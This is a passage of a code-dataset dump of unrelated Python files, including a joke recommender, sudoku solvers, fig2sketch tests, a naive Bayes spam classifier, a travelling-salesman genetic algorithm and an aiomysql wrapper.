Counter\n\n#Item-based collaborative filtering with Adjusted cosine similarity\n\nnum_jokes=100\nnum_users=24983\n#24983\n\nuserLines=None\nwith open('./jester-data-2.csv', 'r') as f:\n reader=csv.reader(f)\n userLines=list(reader)\n\njokesscore={}\nuserscore={}\nusermean={}\nfor i in xrange(0,num_users):\n userscore[i]=map(float, userLines[i])\n sums=0\n notnull=0\n for j in xrange(1,1+num_jokes):\n print [i,j]\n if userscore[i][j]!=99:\n sums+=userscore[i][j]\n notnull+=1\n usermean[i]=sums/notnull\nvectorMagnitudes = {}\nfor j in xrange(1,1+num_jokes):\n jokesscore[j]=[]\n for i in xrange(0,num_users):\n jokesscore[j].append(float(userLines[i][j])-usermean[i])\n temp=[x **2 if x!=99 else 0 for x in jokesscore[j]]\n vectorMagnitudes[j]=math.sqrt(sum(temp))\n\nwith open('./joke_similarities.csv', 'wb') as f:\n writer=csv.writer(f)\n #writer.writerow(['jokeA', 'jokeB', 'similarity'])\n jokes=list(jokesscore)\n for i, jokeA in enumerate(jokes):\n for jokeB in jokes[i+1:]:\n vectorA=jokesscore[jokeA]\n vectorB=jokesscore[jokeB]\n similarity=sum([a * b if a!=99 and b!=99 else 0 for a, b in zip(vectorA, vectorB)])\n similarity/=vectorMagnitudes[jokeA] * vectorMagnitudes[jokeB]\n writer.writerow([jokeA, jokeB, '%.4f'%similarity])\n \n","repo_name":"ynyeh0221/Jokes-Recommendation-System","sub_path":"jokesnew.py","file_name":"jokesnew.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888270132","text":"from collections import defaultdict\nclass Solution:\n def solveSudoku(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n def could_place(d, row, col):\n return not (d in rows[row] or d in cols[col] or d in boxes[box_index(row, col)])\n \n def place_number(d, row, col):\n rows[row][d] += 1\n cols[col][d] += 1\n boxes[box_index(row, col)][d] += 1\n board[row][col] = str(d)\n\n def place_next_number(row, col):\n \"\"\"\n Call backtrack function in recursion\n \"\"\"\n if col == N-1 and row == N-1:\n nonlocal sudoku_solved\n sudoku_solved = True\n else:\n if col == N-1:\n backtrack(row+1, 0)\n else:\n backtrack(row, col+1)\n \n def remove_number(d, row, col):\n del rows[row][d]\n del cols[col][d]\n del boxes[box_index(row, col)][d]\n board[row][col] = '.'\n \n def backtrack(row = 0, col = 0):\n if board[row][col] == '.':\n for d in range(1, 10):\n if could_place(d, row, col):\n place_number(d, row, col)\n place_next_number(row, col)\n if not sudoku_solved:\n remove_number(d, row, col)\n else:\n place_next_number(row, col)\n \n # box size\n n = 3\n # row size\n N = n * n\n # lambda function to compute box index\n box_index = lambda row, col: (row // n) * n + col // n\n # init row, columns and boxes\n rows = [defaultdict(int) for i in range(N)]\n cols = [defaultdict(int) for i in range(N)]\n boxes = [defaultdict(int) for i in range(N)]\n for i in range(N):\n for j in range(N):\n if board[i][j] != '.':\n d = int(board[i][j])\n place_number(d, i, j)\n \n sudoku_solved = False\n backtrack()\n\n\n def solveSudoku(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n m, n = 9, 9\n\n def isValid(r, c, n):\n for i in range(9):\n if board[r][i] == n:\n return False\n if board[i][c] == n:\n return False\n if board[r//3*3+i//3][c//3*3+i%3] == n:\n return False\n return True\n\n def backtrack(i, j):\n # if col is placed, place next row\n if j == 9:\n return backtrack(i+1, 0)\n # if all rows are placed, then solved\n if i == 9:\n return True\n # if cannot be placed, move to the next position\n if board[i][j] != \".\":\n return backtrack(i, j+1)\n \n # select from all possible candidates\n for n in range(1, 10):\n if not isValid(i, j, str(n)):\n continue\n board[i][j] = str(n)\n if backtrack(i, j+1):\n return True\n board[i][j] = \".\"\n return False\n\n return backtrack(0, 0)\n\n \n\n\n\n\n ","repo_name":"xiaofanc/leetcode","sub_path":"0037-sudoku-solver.py","file_name":"0037-sudoku-solver.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12963885111","text":"import pytest\nimport tempfile\nimport fig2sketch\nfrom zipfile import ZipFile\nimport json\nfrom converter import utils\nfrom unittest.mock import ANY\nimport re\n\n\n@pytest.fixture(scope=\"module\")\ndef sketch_doc(tmp_path_factory):\n out_path = f'{tmp_path_factory.mktemp(\"structure\")}/out.sketch'\n args = fig2sketch.parse_args([\"tests/data/structure.fig\", out_path, \"--salt=1234\"])\n fig2sketch.run(args)\n\n with ZipFile(out_path) as sketch:\n yield sketch\n\n\ndef test_user(sketch_doc):\n with sketch_doc.open(\"user.json\") as user_json:\n user = json.load(user_json)\n assert \"8F292FCA-49C0-4E31-957E-93FB2D1A7231\" in user\n assert \"A4E5259A-9CE6-49D9-B4A1-A8062C205347\" in user\n assert user[\"document\"] == {\n \"expandedSymbolPathsInSidebar\": [],\n \"expandedTextStylePathsInPopover\": [],\n \"libraryListCollapsed\": 0,\n \"pageListCollapsed\": 0,\n \"pageListHeight\": 200,\n }\n\n\ndef test_meta(sketch_doc):\n with sketch_doc.open(\"meta.json\") as meta_json:\n meta = json.load(meta_json)\n assert meta == {\n \"commit\": \"1899e24f63af087a9dd3c66f73b492b72c27c2c8\",\n \"pagesAndArtboards\": {\n \"8F292FCA-49C0-4E31-957E-93FB2D1A7231\": {\n \"name\": \"Page 1\",\n \"artboards\": {\n \"60CDCBD8-345A-4796-804B-C6A97C9C0587\": {\"name\": \"Groups\"},\n \"B4AC371F-D026-411F-985B-F92A86A928F6\": {\"name\": \"Symbols and images\"},\n },\n },\n \"A4E5259A-9CE6-49D9-B4A1-A8062C205347\": {\n \"name\": \"Symbols\",\n \"artboards\": {\"FA7E522B-5FF7-4393-AD4D-44C2A82CF837\": {\"name\": \"Component 1\"}},\n },\n },\n \"version\": 144,\n \"compatibilityVersion\": 99,\n \"coeditCompatibilityVersion\": 143,\n \"app\": \"com.bohemiancoding.sketch3\",\n \"autosaved\": 0,\n \"variant\": \"NONAPPSTORE\",\n \"created\": {\n \"commit\": \"1899e24f63af087a9dd3c66f73b492b72c27c2c8\",\n \"appVersion\": \"93\",\n \"build\": 155335,\n \"app\": \"com.bohemiancoding.sketch3\",\n \"compatibilityVersion\": 99,\n \"coeditCompatibilityVersion\": 143,\n \"version\": 144,\n \"variant\": \"NONAPPSTORE\",\n },\n \"saveHistory\": [\"NONAPPSTORE.155335\"],\n \"appVersion\": \"93\",\n \"build\": 155335,\n }\n\n\ndef test_document(sketch_doc):\n with sketch_doc.open(\"document.json\") as doc_json:\n doc = json.load(doc_json)\n assert doc[\"_class\"] == \"document\"\n assert doc[\"pages\"] == [\n {\n \"_class\": \"MSJSONFileReference\",\n \"_ref_class\": \"MSImmutablePage\",\n \"_ref\": \"pages/8F292FCA-49C0-4E31-957E-93FB2D1A7231\",\n },\n {\n \"_class\": \"MSJSONFileReference\",\n \"_ref_class\": \"MSImmutablePage\",\n \"_ref\": \"pages/A4E5259A-9CE6-49D9-B4A1-A8062C205347\",\n },\n ]\n assert doc[\"fontReferences\"] == [\n {\n \"_class\": \"fontReference\",\n \"do_objectID\": \"45406576-C7A2-4277-9C6E-B60F3D54ECC3\",\n \"fontData\": {\n \"_class\": \"MSJSONFileReference\",\n \"_ref_class\": \"MSFontData\",\n \"_ref\": \"fonts/07f64e2c2cfb24e6899ca67886d4ca9ed1c089c1\",\n },\n \"fontFamilyName\": \"Inter\",\n \"fontFileName\": \"Inter-Regular.ttf\",\n \"postscriptNames\": [\"Inter-Regular\"],\n \"options\": 3,\n }\n ]\n assert doc[\"userInfo\"] == {\n \"fig2sketch\": {\"can_detach\": True, \"salt\": \"31323334\", \"version\": ANY}\n }\n\n # Version looks like a version number\n assert re.match(r\"\\d+\\.\\d+\\.\\d+.*\", doc[\"userInfo\"][\"fig2sketch\"][\"version\"])\n\n\n@pytest.mark.parametrize(\n \"img\",\n [\n \"images/616d10a80971e08c6b43a164746afac1972c7ccc.png\",\n \"images/92e4d5e0c24ffd632c3db3264e62cc907c2f5e29\",\n \"fonts/07f64e2c2cfb24e6899ca67886d4ca9ed1c089c1\",\n ],\n)\ndef test_file_hashes(sketch_doc, img):\n with sketch_doc.open(img) as data:\n x = utils.generate_file_ref(data.read())\n assert x == img.split(\".\")[0].split(\"/\")[1]\n\n\ndef test_page(sketch_doc):\n with sketch_doc.open(\"pages/8F292FCA-49C0-4E31-957E-93FB2D1A7231.json\") as page_json:\n page = json.load(page_json)\n assert page[\"name\"] == \"Page 1\"\n assert len(page[\"layers\"]) == 2\n groups, syms = page[\"layers\"]\n\n # Groups artboard\n assert groups[\"_class\"] == \"artboard\"\n assert groups[\"name\"] == \"Groups\"\n assert len(groups[\"layers\"]) == 1\n\n g2 = groups[\"layers\"][0]\n assert g2[\"_class\"] == \"group\"\n assert len(g2[\"layers\"]) == 2\n\n g1 = g2[\"layers\"][1]\n assert g1[\"_class\"] == \"group\"\n assert len(g1[\"layers\"]) == 2\n\n r = g1[\"layers\"][0]\n assert r[\"_class\"] == \"rectangle\"\n assert \"layers\" not in r\n\n # Symbols artboard\n assert syms[\"_class\"] == \"artboard\"\n assert syms[\"name\"] == \"Symbols and images\"\n i1, i2, i3, jpg, png, svg = syms[\"layers\"]\n\n # Master instance\n assert i1[\"_class\"] == \"symbolInstance\"\n assert i1[\"overrideValues\"] == []\n\n # Instance with text override\n assert i2[\"_class\"] == \"symbolInstance\"\n assert i2[\"overrideValues\"] == [\n {\n \"_class\": \"overrideValue\",\n \"overrideName\": \"659F77C5-AF49-4288-8C6C-C1CE6684C282_stringValue\",\n \"value\": \"XYZ\",\n }\n ]\n\n # Instance with color override (detached)\n assert i3[\"_class\"] == \"group\"\n assert len(i3[\"layers\"]) == 2\n assert i3[\"layers\"][0][\"_class\"] == \"rectangle\"\n assert i3[\"layers\"][0][\"style\"][\"fills\"][0][\"color\"] == {\n \"_class\": \"color\",\n \"alpha\": 1.0,\n \"blue\": 0.0,\n \"green\": 0.0,\n \"red\": 1.0,\n }\n\n # JPG image\n assert jpg[\"_class\"] == \"rectangle\"\n assert jpg[\"style\"][\"fills\"][0][\"fillType\"] == 4\n assert (\n jpg[\"style\"][\"fills\"][0][\"image\"][\"_ref\"]\n == \"images/92e4d5e0c24ffd632c3db3264e62cc907c2f5e29\"\n )\n\n # PNG image\n assert png[\"_class\"] == \"rectangle\"\n assert png[\"style\"][\"fills\"][0][\"fillType\"] == 4\n assert (\n png[\"style\"][\"fills\"][0][\"image\"][\"_ref\"]\n == \"images/616d10a80971e08c6b43a164746afac1972c7ccc.png\"\n )\n\n # SVG image\n assert svg[\"_class\"] == \"group\"\n assert svg[\"layers\"][0][\"hasClippingMask\"] == True\n for l in svg[\"layers\"][1:]:\n assert l[\"_class\"] in [\"shapePath\", \"shapeGroup\"]\n\n\ndef test_symbols_page(sketch_doc):\n with sketch_doc.open(\"pages/A4E5259A-9CE6-49D9-B4A1-A8062C205347.json\") as page_json:\n page = json.load(page_json)\n assert page[\"name\"] == \"Symbols\"\n assert len(page[\"layers\"]) == 1\n\n symbol = page[\"layers\"][0]\n assert symbol[\"name\"] == \"Component 1\"\n assert symbol[\"_class\"] == \"symbolMaster\"\n\n assert len(symbol[\"layers\"]) == 2\n\n\ndef test_files(sketch_doc):\n assert sketch_doc.namelist() == [\n \"previews/preview.png\",\n \"images/616d10a80971e08c6b43a164746afac1972c7ccc.png\",\n \"images/92e4d5e0c24ffd632c3db3264e62cc907c2f5e29\",\n \"pages/8F292FCA-49C0-4E31-957E-93FB2D1A7231.json\",\n \"pages/A4E5259A-9CE6-49D9-B4A1-A8062C205347.json\",\n \"fonts/07f64e2c2cfb24e6899ca67886d4ca9ed1c089c1\",\n \"document.json\",\n \"user.json\",\n \"meta.json\",\n ]\n","repo_name":"sketch-hq/fig2sketch","sub_path":"tests/integration/test_structure.py","file_name":"test_structure.py","file_ext":"py","file_size_in_byte":7831,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"3058390604","text":"#!/usr/bin/python3\n\nfilename = \"13.input\"\nrd = open(filename, \"r\")\n\ncanDepart = int(rd.readline().strip())\nline = rd.readline().strip().split(\",\")\n\nminTime = -1\nresult = 0\nmaxStep = 0\nmaxIdx = 0\nd = {}\nidx = -1\n\nfor i in line:\n idx += 1\n if i == \"x\":\n continue\n busId = int(i)\n diff = canDepart % busId\n diff = busId - diff\n\n if busId > maxStep:\n maxStep = busId\n maxIdx = idx\n d[busId] = idx\n\n if minTime == -1 or diff < minTime:\n minTime = diff\n result = minTime * busId\n\n\nprint(result)\n\nprint(d)\n\nidx = 700000000000263\nidx = 760171380521445 + maxIdx # 939 minutes to calculate on Azure instance\ncnt = 0\nwhile True:\n found = True\n cnt += 1\n if cnt % 1000000 == 0:\n print(idx)\n #print(idx)\n\n for i in d:\n if (idx + d[i] - maxIdx) % i != 0:\n found = False\n break\n\n if found:\n print(idx - maxIdx)\n break\n\n idx += maxStep\n","repo_name":"mikenev/advent2020","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12005919626","text":"N, M = map(int, input().split())\n\nP = []\n\n\"\"\"떼어낸 체스판\"\"\"\nnum = []\n\"\"\"카운트 횟수 리스트\"\"\"\ncounts = []\n\n\"\"\"한 글자씩 리스트에\"\"\"\nfor i in range(N):\n s = input()\n for w in range(len(s)):\n P.append(s[w])\n\n\ndef counting(numli):\n count = 0\n\n for j in range(8):\n for y in range(7):\n if numli[j][y] == numli[j][y + 1] and numli[j][y + 1] == 'B':\n numli[j][y + 1] = 'W'\n count += 1\n elif numli[j][y] == numli[j][y + 1] and numli[j][y + 1] == 'W':\n numli[j][y + 1] = 'B'\n count += 1\n \"\"\"행의 마지막 다음행 처음\"\"\"\n if y == 6 and j < 7:\n if numli[j][y + 1] != numli[j + 1][0]:\n numli[j + 1][0] = numli[j][y + 1]\n count += 1\n \"\"\"과반수 이상 바꾸면 흑과 백을 반대로 바꾸는게 카운트가 더 작음\"\"\"\n if count > 32:\n count = 64 - count\n return count\n return count\n\n\nfor o in range(N - 7):\n for q in range(M - 7):\n num = []\n for z in range(8):\n num.append(P[0 + q + (o + z) * M: 8 + q + (o + z) * M])\n \"\"\"8 * 8 체스판 떼어 오기\"\"\"\n counts.append(counting(num))\nprint(min(counts))\n\n\n","repo_name":"hyunmingit/Python","sub_path":"Baekjoon/step10/체스판색칠.py","file_name":"체스판색칠.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4461680040","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport requests\nimport os\nimport os.path\n\nclass Tryon1Pipeline(object):\n def process_item(self, item, spider):\n detailURL = item['imageUrl']\n\n imageUrl_others = item[\"imageUrlOthers\"]\n\n path = '../../tmp/images/full/'\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n image=requests.get(detailURL)\n\n path = path + item['id'] + '.jpg'\n\n f=open(path,'wb')\n f.write(image.content)\n f.close()\n\n prefix = 'https://s3-us-west-1.amazonaws.com/maydayproject/item/'\n item['imageUrl'] = prefix + item['id'] + '.jpg'\n\n for index, url in enumerate(imageUrl_others):\n image = requests.get(url)\n path = path + item['id'] + '_' + str(index)+'.jpg'\n f = open(path, 'wb')\n f.write(image.content)\n f.close()\n imageUrl_others[index] = prefix + item['id'] + '_' + str(index)+'.jpg'\n\n if os.path.isfile(path):\n return item","repo_name":"merlintang/crawler-images","sub_path":"crawler/tryon_1/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14628720653","text":"\r\nimport matplotlib.animation as animation\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random as rnd\r\n\r\ndef clip(x):\r\n if x < 0:\r\n return (x + W)\r\n elif x >= W:\r\n return (x - W)\r\n else:\r\n return (x)\r\n\r\ndef gtypeToPtype(gtype):\r\n return gtype\r\n\r\ndef fitnessFunction(ptype):\r\n Route = 0\r\n for i in range(L-1):\r\n Route +=((Map[ptype[i]].x - Map[ptype[i+1]].x)**2+(Map[ptype[i]].y - Map[ptype[i+1]].y)**2)**0.5\r\n return Route\r\n\r\nclass Agent(object):\r\n def __init__(self, gtype):\r\n self.genotype = gtype[:]\r\n self.phenotype = self.genotype\r\n self.fitness = 0.0\r\n self.mute = False\r\n self.Cross = False\r\n\r\n # def ini(self):\r\n # self.mute = False\r\n # self.Cross = False\r\n\r\n def getOffspring(self):\r\n o = Agent(self.genotype)\r\n for i in range(L):\r\n if (rnd.random() < MUT):\r\n j = rnd.randint(1,L-1)\r\n o.genotype[i], o.genotype[j] = o.genotype[j], o.genotype[i]\r\n self.mute = True\r\n # o.genotype[i] = 1 - o.genotype[i]\r\n return (o)\r\n\r\n def develop(self, dfunc):\r\n self.phenotype= dfunc(self.genotype)\r\n\r\n def evaluate(self, efunc):\r\n self.fitness= efunc(self.genotype)\r\n\r\n\r\nclass City(object):\r\n def __init__(self):\r\n self.x = rnd.randint(0, W - 1)\r\n self.y = rnd.randint(0, W - 1)\r\n\r\n def randomwalk(self):\r\n self.x += rnd.randint(-1, 1)\r\n self.y += rnd.randint(-1, 1)\r\n self.x = clip(self.x)\r\n self.y = clip(self.y)\r\n\r\n def isOverlapped(self):\r\n for a in Map:\r\n if (a != self):\r\n if (a.x == self.x and a.y == self.y):\r\n return True\r\n return False\r\n\r\n def findNewSpace(self):\r\n self.randomwalk()\r\n while (self.isOverlapped()):\r\n self.randomwalk()\r\n\r\ndef selectAnAgentByTournament(pop,order):\r\n pop.sort(key = lambda x:x.fitness, reverse=False)\r\n return (pop[order])\r\n\r\ndef checkRepeat(i,split):\r\n for j in split:\r\n if j == i:\r\n return True\r\n return False\r\n\r\n\r\ndef crossover(a1, a2):\r\n # if (operator.eq(a1,a2)):\r\n # return a1,a2\r\n o1 = a1\r\n o2 = a2\r\n point1 = rnd.randint(1, L - 1)\r\n point2 = rnd.randint(point1, L)\r\n # print(\"p1:\"+str(point1)+\"p2:\"+str(point2))\r\n # print(\"F1\")\r\n # print(\"a1:\"+str(a1.genotype))\r\n # print(\"a2:\"+str(a2.genotype))\r\n # print(\"o1:\"+str(o1.genotype))\r\n # print(\"o2:\"+str(o2.genotype))\r\n\r\n for i in range(point1, point2):\r\n # print(str(o1.genotype[i]))\r\n # print(str(o2.genotype[i]))\r\n temp = o1.genotype[i]\r\n o1.genotype[i]=o2.genotype[i]\r\n o2.genotype[i]=temp\r\n # o1.genotype[i], o2.genotype[i] = o2.genotype[i], o1.genotype[i]\r\n # print(\"F2\")\r\n # print(\"o1:\"+str(o1.genotype))\r\n # print(\"o2:\"+str(o2.genotype))\r\n m1 = o1.genotype[point1:point2]\r\n m2 = o2.genotype[point1:point2]\r\n counter1 = 0\r\n counter2 = 0\r\n for i in range(0, L):\r\n sp1 = []\r\n sp2 = []\r\n if i < point1:\r\n sp1 = m1\r\n sp1 += (o1.genotype[:i])\r\n sp2 = m2\r\n sp2 += (o2.genotype[:i])\r\n elif i >= point2:\r\n sp1 += o1.genotype[:i]\r\n sp2 += o2.genotype[:i]\r\n else:\r\n continue\r\n while checkRepeat(o1.genotype[i], sp1):\r\n o1.genotype[i] = counter1\r\n counter1 += 1\r\n while checkRepeat(o2.genotype[i], sp2):\r\n o2.genotype[i] = counter2\r\n counter2 += 1\r\n # print(\"F3\")\r\n # print(\"o1:\"+str(o1.genotype))\r\n # print(\"o1:\"+str(o2.genotype))\r\n o1.Cross = True\r\n o2.Cross = True\r\n return o1, o2\r\n\r\n#N for Gene, L for city and the length\r\nSEED=101\r\nT = 100\r\nW = 30\r\nN = 30\r\nL = 20\r\nMUT= 0.05\r\nCROSS= 0.2\r\nrnd.seed(SEED)\r\n\r\n\r\nMap = []\r\nfor i in range(L):\r\n c = City()\r\n c.findNewSpace()\r\n Map.append(c)\r\n\r\npopulation = []\r\naverageFitness= []\r\nbestFitness= []\r\nMUT_Series = []\r\nbest = None\r\n\r\n# def check(gene):\r\n# for i in range(L):\r\n# for j in range(L):\r\n# if (gene[i]==gene[j] and i!=j):\r\n# return False\r\n# return True\r\n#\r\n# for g in population:\r\n# print(str(g.genotype))\r\n# print(str(check(g.genotype)))\r\n\r\ndef loop():\r\n for t in range(T):\r\n step()\r\n\r\ndef init():\r\n global population,best\r\n population.clear()\r\n best = None\r\n No = [i for i in range(L)]\r\n population = [Agent(rnd.sample(No, L)) for i in range(N)]\r\n best = population[0]\r\n\r\ndef step():\r\n global population,best\r\n best = population[0]\r\n for p in population:\r\n p.evaluate(fitnessFunction)\r\n if p.fitness < best.fitness:\r\n best = p\r\n\r\n newpop = []\r\n for i in range(int(N / 2)):\r\n n1 = selectAnAgentByTournament(population,i).getOffspring()\r\n n2 = selectAnAgentByTournament(population,i+1).getOffspring()\r\n\r\n s1 = n1\r\n s2 = n2\r\n\r\n if rnd.random() < CROSS:\r\n s1,s2 = crossover(n1, n2)\r\n newpop.append(s1)\r\n newpop.append(s2)\r\n\r\n population = newpop\r\n\r\n\r\ndef update():\r\n global bestFitness,averageFitness\r\n bestFitness.append(best.fitness)\r\n for p in population:\r\n p.evaluate(fitnessFunction)\r\n print(str(np.average([a.fitness for a in population])))\r\n averageFitness.append(np.average([a.fitness for a in population]))\r\n\r\n\r\nfor i in range(20):\r\n MUT = i/40\r\n MUT_Series.append(MUT)\r\n init()\r\n loop()\r\n update()\r\n\r\nfig = plt.figure()\r\nplt.plot(MUT_Series,bestFitness, label = \"Best\")\r\nplt.plot(MUT_Series,averageFitness, label = \"Average\")\r\nplt.xlabel(\"MUT\")\r\nplt.ylabel(\"average / best fitness\")\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"Freyja-Leky/Python_Projects","sub_path":"Complex_Programming/SalesMan4Para.py","file_name":"SalesMan4Para.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2890023332","text":"#!/usr/bin/env python\n# coding: utf-8\n# __author__ = 'wang tao'\n\nimport traceback\nimport aiomysql\nimport pymysql\n\n__all__ = [\n \"CustomAioMysql\"\n]\n\n\nclass CustomAioMysql:\n\n def __init__(self,\n host,\n database,\n user,\n password,\n loop=None,\n minsize=3, maxsize=5,\n return_dict=True,\n pool_recycle=7 * 3600,\n autocommit=True,\n charset=\"utf8mb4\", **kwargs):\n\n self.db_args = {\n 'host': host,\n 'db': database,\n 'user': user,\n 'password': password,\n 'minsize': minsize,\n 'maxsize': maxsize,\n 'charset': charset,\n 'loop': loop,\n 'autocommit': autocommit,\n 'pool_recycle': pool_recycle,\n }\n if return_dict:\n self.db_args['cursorclass'] = aiomysql.cursors.DictCursor\n if kwargs:\n self.db_args.update(kwargs)\n self.pool = None\n\n async def init_pool(self):\n \"\"\"\n 初始化连接池\n \"\"\"\n print(\"init pool\")\n self.pool = await aiomysql.create_pool(**self.db_args)\n\n async def query(self, query, *parameters, **kwparameters):\n \"\"\"\n 指定查询\n\n :return [row, ...]\n \"\"\"\n if not self.pool:\n await self.init_pool()\n async with self.pool.acquire() as conn:\n async with conn.cursor() as cur:\n try:\n await cur.execute(query, kwparameters or parameters)\n ret = await cur.fetchall()\n except pymysql.err.InternalError:\n await conn.ping()\n await cur.execute(query, kwparameters or parameters)\n ret = await cur.fetchall()\n return ret\n\n async def get(self, query, *parameters, **kwparameters):\n \"\"\"\n 指定查询\n\n :return row\n \"\"\"\n if not self.pool:\n await self.init_pool()\n async with self.pool.acquire() as conn:\n async with conn.cursor() as cur:\n try:\n await cur.execute(query, kwparameters or parameters)\n ret = await cur.fetchone()\n except pymysql.err.InternalError:\n await conn.ping()\n await cur.execute(query, kwparameters or parameters)\n ret = await cur.fetchone()\n return ret\n\n async def execute(self, query, *parameters, **kwparameters):\n \"\"\"\n 执行指定查询语句\n \"\"\"\n if not self.pool:\n await self.init_pool()\n async with self.pool.acquire() as conn:\n async with conn.cursor() as cur:\n try:\n await cur.execute(query, kwparameters or parameters)\n except Exception:\n # https://github.com/aio-libs/aiomysql/issues/340\n await conn.ping()\n await cur.execute(query, kwparameters or parameters)\n return cur.lastrowid\n","repo_name":"wtfocus/code-demo","sub_path":"tornado_demo/models/custom_aiomysql.py","file_name":"custom_aiomysql.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74096979894","text":"import tensorflow as tf\nimport tensorflow.keras.layers as layers\nfrom pathlib import Path\nimport numpy as np\n\nfrom ..tools import readLog\nbase_path = Path(__file__).parent\nfile_path = (base_path / \"../dataCollection/logs/flight2.txt\").resolve()\ndataSet = readLog.FlightDataSet(file_path)\n\nHISTORY_LENGTH=20\ndef getSingleTimeStepProcessor():\n input=layers.Input(shape=(11,))\n y=layers.Dense(units=10,activation='tanh')(input)\n y=layers.Dense(units=7,activation='tanh')(y)\n y=layers.Dense(units=3,activation='tanh')(y)\n y=layers.Dense(units=1)(y)\n return tf.keras.Model(input,y)\n\nstsp=getSingleTimeStepProcessor()\ndef getRNN_Model():\n elvHist=layers.Input(shape=(HISTORY_LENGTH,),name='elvHistory')\n pchHist=layers.Input(shape=(HISTORY_LENGTH,),name='pchHistory')\n stacked=tf.stack([elvHist,pchHist],axis=-1)\n lstm=layers.LSTM(11, return_sequences=True)(stacked)\n outputs=[]\n for i in range(HISTORY_LENGTH):\n tsInput=lstm[:,i]\n nextOut=stsp(tsInput)\n outputs.append(nextOut)\n unifiedOut=tf.concat(values=outputs,axis=1)\n return tf.keras.Model([elvHist,pchHist],unifiedOut)\nmodel=getRNN_Model()\nmodel.summary()\n\n\n\nSTEP = 0.1\ndef getSamples():\n startTime = 0\n pitchSer = []\n elvSer = []\n labels = []\n while startTime+STEP*HISTORY_LENGTH < dataSet.length:\n elvFrame = []\n pitchFrame = []\n for i in range(0, HISTORY_LENGTH):\n frame = dataSet[startTime+i*STEP]\n elvFrame.append(frame.rx.elv)\n pitchFrame.append(frame.basic.p)\n pitchSer.append(pitchFrame)\n elvSer.append(elvFrame)\n newLabel=pitchFrame.copy()\n newLabel.pop(0)\n newLabel.append(dataSet[startTime+STEP*HISTORY_LENGTH].basic.p)\n labels.append(newLabel)\n startTime += 1\n return elvSer, pitchSer, labels\n\nxdata, ydata, labels = getSamples()\n# xdata=tf.data.Dataset.from_tensors(xdata)\n# ydata=tf.data.Dataset.from_tensors(ydata)\nxdata = np.array(xdata)\nydata = np.array(ydata)\nlabels = np.array(labels)\nmodel.compile(\n optimizer=tf.keras.optimizers.Adam(),\n loss=tf.losses.mse\n)\nmodel.fit(\n x=[xdata, ydata],\n y=labels,\n batch_size=50,\n epochs=150\n)\n\n\ndef pred(elv, pitch):\n elv = np.array([elv])\n pitch = np.array([pitch])\n res = model.predict([elv, pitch])\n return np.asscalar(res[0,-1])\n\n\npitchSer = [0 for i in range(HISTORY_LENGTH)]\nelvSer = [0.5 for i in range(HISTORY_LENGTH)]\nwhile True:\n next = pred(elvSer, pitchSer)\n print(next)\n pitchSer.pop(0)\n elvSer.pop(0)\n pitchSer.append(next)\n elvSer.append(float(input()))","repo_name":"fynsta/Intelliplane","sub_path":"simulator/helper/models/rnnSim.py","file_name":"rnnSim.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"41078525117","text":"import MLAProject.Bayes.naiveBayes as nb\nimport re\nimport random\n\nSPAM_PATH = './res/mail/spam/%d.txt'\nHAM_PATH = './res/mail/ham/%d.txt'\n\n\ndef text_parse(big_string):\n list_of_tokens = re.split(r'\\w*', big_string)\n return [token.lower() for token in list_of_tokens if len(token) > 2]\n\n\ndef mail_classify_test(cv=5):\n doc_list = []\n class_list = []\n for i in range(1, 26):\n print(i)\n doc_list.append(text_parse(open(SPAM_PATH % i).read()))\n class_list.append(1)\n doc_list.append(text_parse(open(HAM_PATH % i).read()))\n class_list.append(0)\n vocab_list = nb.create_vocab_database(doc_list)\n total_cv_err_rate = 0\n for times in range(cv):\n train_set = [i for i in range(50)]\n test_set = []\n for i in range(10):\n rand_index = int(random.uniform(0, len(train_set)))\n test_set.append(train_set[rand_index])\n del (train_set[rand_index])\n train_mat = []\n train_class = []\n for i in train_set:\n train_mat.append(nb.input_transform_vocab(vocab_list, doc_list[i]))\n train_class.append(class_list[i])\n pw, pc = nb.train_naive_bayes(train_mat, train_class)\n err_count = 0\n for i in range(len(test_set)):\n result = nb.classify(pw, pc, nb.input_transform_vocab(vocab_list, doc_list[i]))\n if result != class_list[i]:\n print('error mail:', test_set[i])\n err_count += 1\n err_rate = err_count / float(len(test_set))\n print('错误率:%.2f' % err_rate)\n total_cv_err_rate += err_rate\n total_cv_err_rate = total_cv_err_rate / cv\n print('交叉验证%d次后的错误率为:%.2f' % (cv, total_cv_err_rate))\n\n\nif __name__ == '__main__':\n mail_classify_test()\n\n","repo_name":"HanGaaaaa/MLAProject","sub_path":"Bayes/NBforMailClassify.py","file_name":"NBforMailClassify.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10819344398","text":"from 